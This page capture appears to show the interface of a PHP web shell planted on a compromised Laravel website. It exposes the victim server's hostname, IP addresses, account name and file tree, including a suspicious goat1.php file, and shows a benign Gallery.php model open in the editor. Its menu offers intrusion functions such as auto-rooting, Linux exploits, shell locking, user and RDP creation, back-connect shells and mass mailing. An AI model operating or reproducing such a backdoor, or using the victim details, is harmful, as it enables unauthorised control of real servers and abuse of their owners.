Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdpms.com /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
-
[ DIR ]
drwxr-xr-x
Actions
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Helpers
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Providers
[ DIR ]
drwxr-xr-x
View
[ DIR ]
drwxr-xr-x
AdSense.php
292
B
-rw-r--r--
Audio.php
405
B
-rw-r--r--
Category.php
1.04
KB
-rw-r--r--
Client.php
1.3
KB
-rw-r--r--
Comment.php
680
B
-rw-r--r--
Gallery.php
895
B
-rw-r--r--
ImageUpload.php
370
B
-rw-r--r--
Instagram.php
901
B
-rw-r--r--
Menu.php
407
B
-rw-r--r--
Message.php
421
B
-rw-r--r--
Post.php
1.71
KB
-rw-r--r--
User.php
2.08
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
menu_item.php
462
B
-rw-r--r--
review.php
524
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Gallery.php
<?php namespace App; use Illuminate\Database\Eloquent\Model; use Cviebrock\EloquentSluggable\Sluggable; use App\ImageUpload; class Gallery extends Model { use Sluggable; /********************************************************** * Return the sluggable configuration array for this model. * @return array **********************************************************/ public function sluggable(): array { return [ 'slug' => [ 'source' => 'Title_en' ] ]; } /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'Title_ar','Title_en','Title_fr','body_ar','body_en','body_fr','ImageUpload_id','slug' ]; public function ImageUpload() { return $this->belongsTo(ImageUpload::class,'ImageUpload_id'); } }
Close